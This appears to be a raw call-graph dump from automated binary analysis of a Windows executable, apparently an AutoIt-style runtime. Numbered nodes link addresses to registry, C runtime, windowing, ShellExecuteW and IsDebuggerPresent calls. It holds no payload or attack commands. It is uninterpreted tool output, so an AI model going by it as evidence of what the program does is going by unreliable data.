84541->84542 84543 4115d7 52 API calls 84542->84543 84544 40bca6 84543->84544 84545 40e4c0 84544->84545 84601 403350 84545->84601 84547 40e4cb RegOpenKeyExW 84548 427190 RegQueryValueExW 84547->84548 84549 40e4eb 84547->84549 84550 4271b0 84548->84550 84551 42721a RegCloseKey 84548->84551 84549->84531 84552 4115d7 52 API calls 84550->84552 84551->84531 84553 4271cb 84552->84553 84608 43652f 52 API calls 84553->84608 84555 4271d8 RegQueryValueExW 84556 42720e 84555->84556 84557 4271f7 84555->84557 84556->84551 84558 402160 52 API calls 84557->84558 84558->84556 84561 41389e 84559->84561 84566 41381a 84559->84566 84560 4139e8 84586 417f77 46 API calls __getptd_noexit 84560->84586 84561->84560 84563 413a00 84561->84563 84588 417f77 46 API calls __getptd_noexit 84563->84588 84564 4139ed 84587 417f25 10 API calls __wcsicoll 84564->84587 84566->84561 84574 41388a 84566->84574 84581 419e30 46 API calls __wcsicoll 84566->84581 84568 413967 84568->84521 84570 41396c 84570->84561 84570->84568 84573 41397a 84570->84573 84571 413929 84571->84561 84572 413945 84571->84572 84583 419e30 46 API calls __wcsicoll 84571->84583 84572->84561 84572->84568 84577 41395b 84572->84577 84585 419e30 46 API calls __wcsicoll 84573->84585 84574->84561 84580 413909 84574->84580 84582 419e30 46 API calls __wcsicoll 84574->84582 84584 419e30 46 API calls __wcsicoll 84577->84584 84580->84570 84580->84571 84581->84574 84582->84580 84583->84572 84584->84568 84585->84568 84586->84564 84587->84568 84588->84568 84590 419f13 84589->84590 84591 419f0e 84589->84591 84598 417f77 46 API calls __getptd_noexit 84590->84598 84591->84590 84597 419f2b 84591->84597 84593 419f18 84599 417f25 10 API calls __wcsicoll 84593->84599 84596 40e454 84596->84524 84597->84596 84600 417f77 46 API calls __getptd_noexit 84597->84600 84598->84593 84599->84596 84600->84593 84602 403367 84601->84602 84603 403358 84601->84603 84604 4115d7 52 API calls 84602->84604 84603->84547 84605 403370 84604->84605 84606 4115d7 52 API calls 84605->84606 84607 40339e 84606->84607 84607->84547 84608->84555 84609 416454 84646 416c70 84609->84646 84611 416460 GetStartupInfoW 84612 416474 84611->84612 84647 419d5a HeapCreate 84612->84647 84614 4164cd 84615 4164d8 84614->84615 84731 41642b 46 API calls 3 library calls 84614->84731 84648 417c20 GetModuleHandleW 84615->84648 84618 4164de 84619 4164e9 __RTC_Initialize 84618->84619 84732 41642b 46 API calls 3 library calls 84618->84732 84667 41aaa1 GetStartupInfoW 84619->84667 84623 416503 GetCommandLineW 84680 41f584 GetEnvironmentStringsW 84623->84680 84627 416513 84686 41f4d6 GetModuleFileNameW 84627->84686 84629 41651d 84630 416528 84629->84630 84734 411924 46 API calls 3 library calls 84629->84734 84690 41f2a4 84630->84690 84633 41652e 84634 416539 84633->84634 84735 411924 46 API calls 3 library calls 84633->84735 84704 411703 84634->84704 84637 416541 84639 41654c __wwincmdln 84637->84639 84736 411924 46 API calls 3 library calls 84637->84736 84708 40d6b0 84639->84708 84642 41657c 84738 411906 46 API calls _doexit 84642->84738 84645 416581 __alloc_osfhnd 84646->84611 84647->84614 84649 417c34 84648->84649 84650 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84648->84650 84739 4178ff 49 API calls _free 84649->84739 84652 417c87 TlsAlloc 84650->84652 84655 417cd5 TlsSetValue 84652->84655 84656 417d96 84652->84656 84653 417c39 84653->84618 84655->84656 84657 417ce6 __init_pointers 84655->84657 84656->84618 84740 418151 InitializeCriticalSectionAndSpinCount 84657->84740 84659 417d91 84748 4178ff 49 API calls _free 84659->84748 84661 417d2a 84661->84659 84741 416b49 84661->84741 84664 417d76 84747 41793c 46 API calls 4 library calls 84664->84747 84666 417d7e GetCurrentThreadId 84666->84656 84668 416b49 __calloc_crt 46 API calls 84667->84668 84677 41aabf 84668->84677 84669 41ac6a GetStdHandle 84674 41ac34 84669->84674 84670 416b49 __calloc_crt 46 API calls 84670->84677 84671 41acce SetHandleCount 84679 4164f7 84671->84679 84672 41abb4 84672->84674 84675 41abe0 GetFileType 84672->84675 84676 41abeb InitializeCriticalSectionAndSpinCount 84672->84676 84673 41ac7c GetFileType 84673->84674 84674->84669 84674->84671 84674->84673 84678 41aca2 InitializeCriticalSectionAndSpinCount 84674->84678 84675->84672 84675->84676 84676->84672 84676->84679 84677->84670 84677->84672 84677->84674 84677->84679 84678->84674 84678->84679 84679->84623 84733 411924 46 API calls 3 library calls 84679->84733 84681 41f595 84680->84681 84682 41f599 84680->84682 84681->84627 84758 416b04 84682->84758 84684 41f5bb _memmove 84685 41f5c2 FreeEnvironmentStringsW 84684->84685 84685->84627 84687 41f50b _wparse_cmdline 84686->84687 84688 416b04 __malloc_crt 46 API calls 84687->84688 84689 41f54e _wparse_cmdline 84687->84689 84688->84689 84689->84629 84691 41f2bc _wcslen 84690->84691 84695 41f2b4 84690->84695 84692 416b49 __calloc_crt 46 API calls 84691->84692 84697 41f2e0 _wcslen 84692->84697 84693 41f336 84765 413748 84693->84765 84695->84633 84696 416b49 __calloc_crt 46 API calls 84696->84697 84697->84693 84697->84695 84697->84696 84698 41f35c 84697->84698 84701 41f373 84697->84701 84764 41ef12 46 API calls __wcsicoll 84697->84764 84699 413748 _free 46 API calls 84698->84699 84699->84695 84771 417ed3 84701->84771 84703 41f37f 84703->84633 84705 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 84704->84705 84707 411750 __IsNonwritableInCurrentImage 84705->84707 84790 41130a 51 API calls __cinit 84705->84790 84707->84637 84709 42e2f3 84708->84709 84710 40d6cc 84708->84710 84791 408f40 84710->84791 84712 40d707 84795 40ebb0 84712->84795 84715 40d737 84798 411951 84715->84798 84720 40d751 84810 40f4e0 SystemParametersInfoW SystemParametersInfoW 84720->84810 84722 40d75f 84811 40d590 GetCurrentDirectoryW 84722->84811 84724 40d767 SystemParametersInfoW 84725 40d794 84724->84725 84726 40d78d FreeLibrary 84724->84726 84727 408f40 VariantClear 84725->84727 84726->84725 84728 40d79d 84727->84728 84729 408f40 VariantClear 84728->84729 84730 40d7a6 84729->84730 84730->84642 84737 4118da 46 API calls _doexit 84730->84737 84731->84615 84732->84619 84737->84642 84738->84645 84739->84653 84740->84661 84743 416b52 84741->84743 84744 416b8f 84743->84744 84745 416b70 Sleep 84743->84745 84749 41f677 84743->84749 84744->84659 84744->84664 84746 416b85 84745->84746 84746->84743 84746->84744 84747->84666 84748->84656 84750 41f683 84749->84750 84751 41f69e _malloc 84749->84751 84750->84751 84752 41f68f 84750->84752 84754 41f6b1 HeapAlloc 84751->84754 84756 41f6d8 84751->84756 84757 417f77 46 API calls __getptd_noexit 84752->84757 84754->84751 84754->84756 84755 41f694 84755->84743 84756->84743 84757->84755 84760 416b0d 84758->84760 84759 4135bb _malloc 45 API calls 84759->84760 84760->84759 84761 416b43 84760->84761 84762 416b24 Sleep 84760->84762 84761->84684 84763 416b39 84762->84763 84763->84760 84763->84761 84764->84697 84766 41377c __dosmaperr 84765->84766 84767 413753 RtlFreeHeap 84765->84767 84766->84695 84767->84766 84768 413768 84767->84768 84774 417f77 46 API calls __getptd_noexit 84768->84774 84770 41376e GetLastError 84770->84766 84775 417daa 84771->84775 84774->84770 84776 417dc9 __crtGetStringTypeA_stat __call_reportfault 84775->84776 84777 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84776->84777 84780 417eb5 __call_reportfault 84777->84780 84779 417ed1 GetCurrentProcess TerminateProcess 84779->84703 84781 41a208 84780->84781 84782 41a210 84781->84782 84783 41a212 IsDebuggerPresent 84781->84783 84782->84779 84789 41fe19 84783->84789 84786 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84787 421ff8 GetCurrentProcess TerminateProcess 84786->84787 84788 421ff0 __call_reportfault 84786->84788 84787->84779 84788->84787 84789->84786 84790->84707 84792 408f48 moneypunct 84791->84792 84793 4265c7 VariantClear 84792->84793 84794 408f55 moneypunct 84792->84794 84793->84794 84794->84712 84851 40ebd0 84795->84851 84855 4182cb 84798->84855 84800 41195e 84862 4181f2 LeaveCriticalSection 84800->84862 84802 40d748 84803 4119b0 84802->84803 84804 4119d6 84803->84804 84805 4119bc 84803->84805 84804->84720 84805->84804 84897 417f77 46 API calls __getptd_noexit 84805->84897 84807 4119c6 84898 417f25 10 API calls __wcsicoll 84807->84898 84809 4119d1 84809->84720 84810->84722 84899 401f20 84811->84899 84813 40d5b6 IsDebuggerPresent 84814 40d5c4 84813->84814 84815 42e1bb MessageBoxA 84813->84815 84816 40d5e3 84814->84816 84817 42e1d4 84814->84817 84815->84817 84969 40f520 84816->84969 85071 403a50 52 API calls 3 library calls 84817->85071 84821 40d5fd GetFullPathNameW 84981 401460 84821->84981 84823 40d63b 84824 40d643 84823->84824 84825 42e231 SetCurrentDirectoryW 84823->84825 84826 40d64c 84824->84826 85072 432fee 6 API calls 84824->85072 84825->84824 84996 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84826->84996 84830 42e252 84830->84826 84832 42e25a GetModuleFileNameW 84830->84832 84834 42e274 84832->84834 84835 42e2cb GetForegroundWindow ShellExecuteW 84832->84835 84833 40d656 84837 40d669 84833->84837 84840 40e0c0 74 API calls 84833->84840 85073 401b10 84834->85073 84838 40d688 84835->84838 85004 4091e0 84837->85004 84844 40d692 SetCurrentDirectoryW 84838->84844 84840->84837 84844->84724 84845 42e28d 85080 40d200 52 API calls 2 library calls 84845->85080 84848 42e299 GetForegroundWindow ShellExecuteW 84849 42e2c6 84848->84849 84849->84838 84850 40ec00 LoadLibraryA GetProcAddress 84850->84715 84852 40d72e 84851->84852 84853 40ebd6 LoadLibraryA 84851->84853 84852->84715 84852->84850 84853->84852 84854 40ebe7 GetProcAddress 84853->84854 84854->84852 84856 4182e0 84855->84856 84857 4182f3 EnterCriticalSection 84855->84857 84863 418209 84856->84863 84857->84800 84859 4182e6 84859->84857 84890 411924 46 API calls 3 library calls 84859->84890 84862->84802 84864 418215 __alloc_osfhnd 84863->84864 84865 418225 84864->84865 84866 41823d 84864->84866 84891 418901 46 API calls 2 library calls 84865->84891 84869 416b04 __malloc_crt 45 API calls 84866->84869 84875 41824b __alloc_osfhnd 84866->84875 84868 41822a 84892 418752 46 API calls 9 library calls 84868->84892 84871 418256 84869->84871 84873 41825d 84871->84873 84874 41826c 84871->84874 84872 418231 84893 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84872->84893 84894 417f77 46 API calls __getptd_noexit 84873->84894 84878 4182cb __lock 45 API calls 84874->84878 84875->84859 84880 418273 84878->84880 84881 4182a6 84880->84881 84882 41827b InitializeCriticalSectionAndSpinCount 84880->84882 84885 413748 _free 45 API calls 84881->84885 84883 418297 84882->84883 84884 41828b 84882->84884 84896 4182c2 LeaveCriticalSection _doexit 84883->84896 84886 413748 _free 45 API calls 84884->84886 84885->84883 84887 418291 84886->84887 84895 417f77 46 API calls __getptd_noexit 84887->84895 84891->84868 84892->84872 84894->84875 84895->84883 84896->84875 84897->84807 84898->84809 85081 40e6e0 84899->85081 84903 401f41 GetModuleFileNameW 85099 410100 84903->85099 84905 401f5c 85111 410960 84905->85111 84908 401b10 52 API calls 84909 401f81 84908->84909 85114 401980 84909->85114 84911 401f8e 84912 408f40 VariantClear 84911->84912 84913 401f9d 84912->84913 84914 401b10 52 API calls 84913->84914 84915 401fb4 84914->84915 84916 401980 53 API calls 84915->84916 84917 401fc3 84916->84917 84918 401b10 52 API calls 84917->84918 84919 401fd2 84918->84919 85122 40c2c0 84919->85122 84921 401fe1 84922 40bc70 52 API calls 84921->84922 84923 401ff3 84922->84923 85140 401a10 84923->85140 84925 401ffe 85147 4114ab 84925->85147 84928 428b05 84930 401a10 52 API calls 84928->84930 84929 402017 84931 4114ab __wcsicoll 58 API calls 84929->84931 84932 428b18 84930->84932 84933 402022 84931->84933 84935 401a10 52 API calls 84932->84935 84933->84932 84934 40202d 84933->84934 84936 4114ab __wcsicoll 58 API calls 84934->84936 84937 428b33 84935->84937 84938 402038 84936->84938 84940 428b3b GetModuleFileNameW 84937->84940 84939 402043 84938->84939 84938->84940 84941 4114ab __wcsicoll 58 API calls 84939->84941 84942 401a10 52 API calls 84940->84942 84943 40204e 84941->84943 84944 428b6c 84942->84944 84946 402092 84943->84946 84949 401a10 52 API calls 84943->84949 84954 428b90 _wcscpy 84943->84954 84945 40e0a0 52 API calls 84944->84945 84947 428b7a 84945->84947 84948 4020a3 84946->84948 84946->84954 84950 401a10 52 API calls 84947->84950 84951 428bc6 84948->84951 85155 40e830 53 API calls 84948->85155 84952 402073 _wcscpy 84949->84952 84953 428b88 84950->84953 84959 401a10 52 API calls 84952->84959 84953->84954 84956 401a10 52 API calls 84954->84956 84964 4020d0 84956->84964 84957 4020bb 85156 40cf00 53 API calls 84957->85156 84959->84946 84960 4020c6 84961 408f40 VariantClear 84960->84961 84961->84964 84962 402110 84966 408f40 VariantClear 84962->84966 84964->84962 84967 401a10 52 API calls 84964->84967 85157 40cf00 53 API calls 84964->85157 85158 40e6a0 53 API calls 84964->85158 84968 402120 moneypunct 84966->84968 84967->84964 84968->84813 84970 4295c9 __crtGetStringTypeA_stat 84969->84970 84971 40f53c 84969->84971 84973 4295d9 GetOpenFileNameW 84970->84973 85834 410120 84971->85834 84973->84971 84975 40d5f5 84973->84975 84974 40f545 85838 4102b0 SHGetMalloc 84974->85838 84975->84821 84975->84823 84977 40f54c 85843 410190 GetFullPathNameW 84977->85843 84979 40f559 85854 40f570 84979->85854 85910 402400 84981->85910 84983 40146f 84986 428c29 _wcscat 84983->84986 85919 401500 84983->85919 84985 40147c 84985->84986 85927 40d440 84985->85927 84988 401489 84988->84986 84989 401491 GetFullPathNameW 84988->84989 84990 402160 52 API calls 84989->84990 84991 4014bb 84990->84991 84992 402160 52 API calls 84991->84992 84993 4014c8 84992->84993 84993->84986 84994 402160 52 API calls 84993->84994 84995 4014ee 84994->84995 84995->84823 84997 428361 84996->84997 84998 4103fc LoadImageW RegisterClassExW 84996->84998 85947 44395e EnumResourceNamesW LoadImageW 84997->85947 85946 410490 7 API calls 84998->85946 85001 40d651 85003 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 85001->85003 85002 428368 85003->84833 85005 409202 85004->85005 85006 42d7ad 85004->85006 85050 409216 moneypunct 85005->85050 86219 410940 330 API calls 85005->86219 86222 45e737 90 API calls 3 library calls 85006->86222 85009 409386 85010 40939c 85009->85010 86220 40f190 10 API calls 85009->86220 85010->84838 85070 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 85010->85070 85012 4095b2 85012->85010 85013 4095bf 85012->85013 86221 401a50 330 API calls 85013->86221 85014 409253 PeekMessageW 85014->85050 85016 40d410 VariantClear 85016->85050 85017 4095c6 LockWindowUpdate DestroyWindow GetMessageW 85017->85010 85019 4095f9 85017->85019 85018 42d8cd Sleep 85018->85050 85023 42e158 TranslateMessage DispatchMessageW GetMessageW 85019->85023 85021 42e13b 86240 40d410 VariantClear 85021->86240 85023->85023 85026 42e188 85023->85026 85025 409567 PeekMessageW 85025->85050 85026->85010 85029 46f3c1 107 API calls 85029->85050 85030 40e0a0 52 API calls 85030->85050 85031 46fdbf 108 API calls 85060 4094e0 85031->85060 85032 409551 TranslateMessage DispatchMessageW 85032->85025 85034 42dcd2 WaitForSingleObject 85037 42dcf0 GetExitCodeProcess CloseHandle 85034->85037 85034->85050 85035 44c29d 52 API calls 85035->85060 85036 42dd3d Sleep 85036->85060 86229 40d410 VariantClear 85037->86229 85041 4094cf Sleep 85041->85060 85043 408f40 VariantClear 85043->85060 85045 42d94d timeGetTime 86225 465124 53 API calls 85045->86225 85046 40c620 timeGetTime 85046->85060 85049 465124 53 API calls 85049->85060 85050->85009 85050->85014 85050->85016 85050->85018 85050->85021 85050->85025 85050->85029 85050->85030 85050->85032 85050->85034 85050->85036 85050->85041 85050->85045 85052 47d33e 308 API calls 85050->85052 85050->85060 85064 42e0cc VariantClear 85050->85064 85065 408f40 VariantClear 85050->85065 85066 45e737 90 API calls 85050->85066 85948 4091b0 85050->85948 86006 40afa0 85050->86006 86032 408fc0 85050->86032 86067 408cc0 85050->86067 86081 40d150 85050->86081 86086 40d170 85050->86086 86092 4096a0 85050->86092 86223 465124 53 API calls 85050->86223 86224 40c620 timeGetTime 85050->86224 86239 40e270 VariantClear moneypunct 85050->86239 85051 42dd89 CloseHandle 85051->85060 85052->85050 85054 42de19 GetExitCodeProcess CloseHandle 85054->85060 85055 401b10 52 API calls 85055->85060 85058 42de88 Sleep 85058->85050 85060->85031 85060->85035 85060->85043 85060->85046 85060->85049 85060->85050 85060->85051 85060->85054 85060->85055 85060->85058 85068 401980 53 API calls 85060->85068 86226 45178a 54 API calls 85060->86226 86227 47d33e 330 API calls 85060->86227 86228 453bc6 54 API calls 85060->86228 86230 40d410 VariantClear 85060->86230 86231 443d19 67 API calls _wcslen 85060->86231 86232 4574b4 VariantClear 85060->86232 86233 403cd0 85060->86233 86237 4731e1 VariantClear 85060->86237 86238 4331a2 6 API calls 85060->86238 85064->85050 85065->85050 85066->85050 85068->85060 85070->84838 85071->84823 85072->84830 85074 401b16 _wcslen 85073->85074 85075 4115d7 52 API calls 85074->85075 85078 401b63 85074->85078 85076 401b4b _memmove 85075->85076 85077 4115d7 52 API calls 85076->85077 85077->85078 85079 40d200 52 API calls 2 library calls 85078->85079 85079->84845 85080->84848 85082 40bc70 52 API calls 85081->85082 85083 401f31 85082->85083 85084 402560 85083->85084 85085 40256d __write_nolock 85084->85085 85086 402160 52 API calls 85085->85086 85088 402593 85086->85088 85098 4025bd 85088->85098 85159 401c90 85088->85159 85089 4026f0 52 API calls 85089->85098 85090 4026a7 85091 401b10 52 API calls 85090->85091 85097 4026db 85090->85097 85093 4026d1 85091->85093 85092 401b10 52 API calls 85092->85098 85163 40d7c0 52 API calls 2 library calls 85093->85163 85094 401c90 52 API calls 85094->85098 85097->84903 85098->85089 85098->85090 85098->85092 85098->85094 85162 40d7c0 52 API calls 2 library calls 85098->85162 85164 40f760 85099->85164 85102 410118 85102->84905 85104 42805d 85105 42806a 85104->85105 85220 431e58 85104->85220 85106 413748 _free 46 API calls 85105->85106 85108 428078 85106->85108 85109 431e58 82 API calls 85108->85109 85110 428084 85109->85110 85110->84905 85112 4115d7 52 API calls 85111->85112 85113 401f74 85112->85113 85113->84908 85115 4019a3 85114->85115 85119 401985 85114->85119 85116 4019b8 85115->85116 85115->85119 85823 403e10 53 API calls 85116->85823 85118 40199f 85118->84911 85119->85118 85822 403e10 53 API calls 85119->85822 85121 4019c4 85121->84911 85123 40c2c7 85122->85123 85124 40c30e 85122->85124 85125 40c2d3 85123->85125 85126 426c79 85123->85126 85127 40c315 85124->85127 85128 426c2b 85124->85128 85824 403ea0 52 API calls __cinit 85125->85824 85829 4534e3 52 API calls 85126->85829 85132 40c321 85127->85132 85135 426c5a 85127->85135 85130 426c4b 85128->85130 85131 426c2e 85128->85131 85827 4534e3 52 API calls 85130->85827 85136 40c2de 85131->85136 85826 4534e3 52 API calls 85131->85826 85825 403ea0 52 API calls __cinit 85132->85825 85828 4534e3 52 API calls 85135->85828 85136->84921 85141 401a30 85140->85141 85142 401a17 85140->85142 85144 402160 52 API calls 85141->85144 85143 401a2d 85142->85143 85830 403c30 52 API calls _memmove 85142->85830 85143->84925 85146 401a3d 85144->85146 85146->84925 85148 411523 85147->85148 85149 4114ba 85147->85149 85833 4113a8 58 API calls 3 library calls 85148->85833 85154 40200c 85149->85154 85831 417f77 46 API calls __getptd_noexit 85149->85831 85152 4114c6 85832 417f25 10 API calls __wcsicoll 85152->85832 85154->84928 85154->84929 85155->84957 85156->84960 85157->84964 85158->84964 85160 4026f0 52 API calls 85159->85160 85161 401c97 85160->85161 85161->85088 85162->85098 85163->85097 85224 40f6f0 85164->85224 85166 40f77b _strcat moneypunct 85232 40f850 85166->85232 85171 427c2a 85261 414d04 85171->85261 85173 40f7fc 85173->85171 85174 40f804 85173->85174 85248 414a46 85174->85248 85178 40f80e 85178->85102 85183 4528bd 85178->85183 85180 427c59 85267 414fe2 85180->85267 85182 427c79 85184 4150d1 _fseek 81 API calls 85183->85184 85185 452930 85184->85185 85764 452719 85185->85764 85188 452948 85188->85104 85189 414d04 __fread_nolock 61 API calls 85190 452966 85189->85190 85191 414d04 __fread_nolock 61 API calls 85190->85191 85192 452976 85191->85192 85193 414d04 __fread_nolock 61 API calls 85192->85193 85194 45298f 85193->85194 85195 414d04 __fread_nolock 61 API calls 85194->85195 85196 4529aa 85195->85196 85197 4150d1 _fseek 81 API calls 85196->85197 85198 4529c4 85197->85198 85199 4135bb _malloc 46 API calls 85198->85199 85200 4529cf 85199->85200 85201 4135bb _malloc 46 API calls 85200->85201 85202 4529db 85201->85202 85203 414d04 __fread_nolock 61 API calls 85202->85203 85204 4529ec 85203->85204 85205 44afef GetSystemTimeAsFileTime 85204->85205 85206 452a00 85205->85206 85207 452a36 85206->85207 85208 452a13 85206->85208 85209 452aa5 85207->85209 85210 452a3c 85207->85210 85211 413748 _free 46 API calls 85208->85211 85213 413748 _free 46 API calls 85209->85213 85770 44b1a9 85210->85770 85214 452a1c 85211->85214 85216 452aa3 85213->85216 85217 413748 _free 46 API calls 85214->85217 85215 452a9d 85218 413748 _free 46 API calls 85215->85218 85216->85104 85219 452a25 85217->85219 85218->85216 85219->85104 85221 431e64 85220->85221 85222 431e6a 85220->85222 85223 414a46 __fcloseall 82 API calls 85221->85223 85222->85105 85223->85222 85225 425de2 85224->85225 85226 40f6fc _wcslen 85224->85226 85225->85166 85227 40f710 WideCharToMultiByte 85226->85227 85228 40f756 85227->85228 85229 40f728 85227->85229 85228->85166 85230 4115d7 52 API calls 85229->85230 85231 40f735 WideCharToMultiByte 85230->85231 85231->85166 85234 40f85d __crtGetStringTypeA_stat _strlen 85232->85234 85235 40f7ab 85234->85235 85280 414db8 85234->85280 85236 4149c2 85235->85236 85292 414904 85236->85292 85238 40f7e9 85238->85171 85239 40f5c0 85238->85239 85244 40f5cd _strcat __write_nolock _memmove 85239->85244 85240 414d04 __fread_nolock 61 API calls 85240->85244 85242 425d11 85243 4150d1 _fseek 81 API calls 85242->85243 85245 425d33 85243->85245 85244->85240 85244->85242 85247 40f691 __tzset_nolock 85244->85247 85380 4150d1 85244->85380 85246 414d04 __fread_nolock 61 API calls 85245->85246 85246->85247 85247->85173 85249 414a52 __alloc_osfhnd 85248->85249 85250 414a64 85249->85250 85251 414a79 85249->85251 85520 417f77 46 API calls __getptd_noexit 85250->85520 85253 415471 __lock_file 47 API calls 85251->85253 85258 414a74 __alloc_osfhnd 85251->85258 85255 414a92 85253->85255 85254 414a69 85521 417f25 10 API calls __wcsicoll 85254->85521 85504 4149d9 85255->85504 85258->85178 85589 414c76 85261->85589 85263 414d1c 85264 44afef 85263->85264 85757 442c5a 85264->85757 85266 44b00d 85266->85180 85268 414fee __alloc_osfhnd 85267->85268 85269 414ffa 85268->85269 85270 41500f 85268->85270 85761 417f77 46 API calls __getptd_noexit 85269->85761 85272 415471 __lock_file 47 API calls 85270->85272 85274 415017 85272->85274 85273 414fff 85762 417f25 10 API calls __wcsicoll 85273->85762 85276 414e4e __ftell_nolock 51 API calls 85274->85276 85277 415024 85276->85277 85763 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 85277->85763 85279 41500a __alloc_osfhnd 85279->85182 85281 414dd6 85280->85281 85282 414deb 85280->85282 85289 417f77 46 API calls __getptd_noexit 85281->85289 85282->85281 85286 414df2 85282->85286 85284 414ddb 85290 417f25 10 API calls __wcsicoll 85284->85290 85287 414de6 85286->85287 85291 418f98 77 API calls 6 library calls 85286->85291 85287->85234 85289->85284 85290->85287 85291->85287 85295 414910 __alloc_osfhnd 85292->85295 85293 414923 85348 417f77 46 API calls __getptd_noexit 85293->85348 85295->85293 85297 414951 85295->85297 85296 414928 85349 417f25 10 API calls __wcsicoll 85296->85349 85311 41d4d1 85297->85311 85300 414956 85301 41496a 85300->85301 85302 41495d 85300->85302 85304 414992 85301->85304 85305 414972 85301->85305 85350 417f77 46 API calls __getptd_noexit 85302->85350 85328 41d218 85304->85328 85351 417f77 46 API calls __getptd_noexit 85305->85351 85308 414933 __alloc_osfhnd @_EH4_CallFilterFunc@8 85308->85238 85312 41d4dd __alloc_osfhnd 85311->85312 85313 4182cb __lock 46 API calls 85312->85313 85325 41d4eb 85313->85325 85314 41d567 85315 416b04 __malloc_crt 46 API calls 85314->85315 85317 41d56e 85315->85317 85319 41d57c InitializeCriticalSectionAndSpinCount 85317->85319 85326 41d560 85317->85326 85318 41d5f0 __alloc_osfhnd 85318->85300 85320 41d59c 85319->85320 85321 41d5af EnterCriticalSection 85319->85321 85324 413748 _free 46 API calls 85320->85324 85321->85326 85322 418209 __mtinitlocknum 46 API calls 85322->85325 85324->85326 85325->85314 85325->85322 85325->85326 85356 4154b2 47 API calls __lock 85325->85356 85357 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85325->85357 85353 41d5fb 85326->85353 85329 41d23a 85328->85329 85330 41d255 85329->85330 85342 41d26c __wopenfile 85329->85342 85362 417f77 46 API calls __getptd_noexit 85330->85362 85331 41d421 85334 41d47a 85331->85334 85335 41d48c 85331->85335 85333 41d25a 85363 417f25 10 API calls __wcsicoll 85333->85363 85367 417f77 46 API calls __getptd_noexit 85334->85367 85359 422bf9 85335->85359 85339 41d47f 85368 417f25 10 API calls __wcsicoll 85339->85368 85340 41499d 85352 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 85340->85352 85342->85331 85342->85334 85364 41341f 58 API calls 2 library calls 85342->85364 85344 41d41a 85344->85331 85365 41341f 58 API calls 2 library calls 85344->85365 85346 41d439 85346->85331 85366 41341f 58 API calls 2 library calls 85346->85366 85348->85296 85349->85308 85350->85308 85351->85308 85352->85308 85358 4181f2 LeaveCriticalSection 85353->85358 85355 41d602 85355->85318 85356->85325 85357->85325 85358->85355 85369 422b35 85359->85369 85361 422c14 85361->85340 85362->85333 85363->85340 85364->85344 85365->85346 85366->85331 85367->85339 85368->85340 85370 422b41 __alloc_osfhnd 85369->85370 85371 422b54 85370->85371 85374 422b8a 85370->85374 85372 417f77 __wcsicoll 46 API calls 85371->85372 85373 422b59 85372->85373 85376 417f25 __wcsicoll 10 API calls 85373->85376 85375 422400 __tsopen_nolock 109 API calls 85374->85375 85377 422ba4 85375->85377 85379 422b63 __alloc_osfhnd 85376->85379 85378 422bcb __wsopen_helper LeaveCriticalSection 85377->85378 85378->85379 85379->85361 85383 4150dd __alloc_osfhnd 85380->85383 85381 4150e9 85411 417f77 46 API calls __getptd_noexit 85381->85411 85383->85381 85384 41510f 85383->85384 85393 415471 85384->85393 85385 4150ee 85412 417f25 10 API calls __wcsicoll 85385->85412 85392 4150f9 __alloc_osfhnd 85392->85244 85394 415483 85393->85394 85395 4154a5 EnterCriticalSection 85393->85395 85394->85395 85396 41548b 85394->85396 85397 415117 85395->85397 85398 4182cb __lock 46 API calls 85396->85398 85399 415047 85397->85399 85398->85397 85400 415067 85399->85400 85401 415057 85399->85401 85406 415079 85400->85406 85414 414e4e 85400->85414 85469 417f77 46 API calls __getptd_noexit 85401->85469 85405 41505c 85413 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 85405->85413 85431 41443c 85406->85431 85409 4150b9 85444 41e1f4 85409->85444 85411->85385 85412->85392 85413->85392 85415 414e61 85414->85415 85416 414e79 85414->85416 85470 417f77 46 API calls __getptd_noexit 85415->85470 85417 414139 __fclose_nolock 46 API calls 85416->85417 85419 414e80 85417->85419 85422 41e1f4 __write 51 API calls 85419->85422 85420 414e66 85471 417f25 10 API calls __wcsicoll 85420->85471 85423 414e97 85422->85423 85424 414f09 85423->85424 85426 414ec9 85423->85426 85430 414e71 85423->85430 85472 417f77 46 API calls __getptd_noexit 85424->85472 85427 41e1f4 __write 51 API calls 85426->85427 85426->85430 85428 414f64 85427->85428 85429 41e1f4 __write 51 API calls 85428->85429 85428->85430 85429->85430 85430->85406 85432 414455 85431->85432 85436 414477 85431->85436 85433 414139 __fclose_nolock 46 API calls 85432->85433 85432->85436 85434 414470 85433->85434 85473 41b7b2 77 API calls 6 library calls 85434->85473 85437 414139 85436->85437 85438 414145 85437->85438 85439 41415a 85437->85439 85474 417f77 46 API calls __getptd_noexit 85438->85474 85439->85409 85441 41414a 85475 417f25 10 API calls __wcsicoll 85441->85475 85443 414155 85443->85409 85445 41e200 __alloc_osfhnd 85444->85445 85446 41e223 85445->85446 85447 41e208 85445->85447 85448 41e22f 85446->85448 85454 41e269 85446->85454 85496 417f8a 46 API calls __getptd_noexit 85447->85496 85498 417f8a 46 API calls __getptd_noexit 85448->85498 85451 41e20d 85497 417f77 46 API calls __getptd_noexit 85451->85497 85453 41e234 85499 417f77 46 API calls __getptd_noexit 85453->85499 85476 41ae56 85454->85476 85457 41e23c 85500 417f25 10 API calls __wcsicoll 85457->85500 85458 41e26f 85459 41e291 85458->85459 85460 41e27d 85458->85460 85501 417f77 46 API calls __getptd_noexit 85459->85501 85486 41e17f 85460->85486 85464 41e215 __alloc_osfhnd 85464->85405 85465 41e289 85503 41e2c0 LeaveCriticalSection __unlock_fhandle 85465->85503 85466 41e296 85502 417f8a 46 API calls __getptd_noexit 85466->85502 85469->85405 85470->85420 85471->85430 85472->85430 85473->85436 85474->85441 85475->85443 85477 41ae62 __alloc_osfhnd 85476->85477 85478 41aebc 85477->85478 85479 4182cb __lock 46 API calls 85477->85479 85480 41aec1 EnterCriticalSection 85478->85480 85481 41aede __alloc_osfhnd 85478->85481 85482 41ae8e 85479->85482 85480->85481 85481->85458 85483 41aeaa 85482->85483 85484 41ae97 InitializeCriticalSectionAndSpinCount 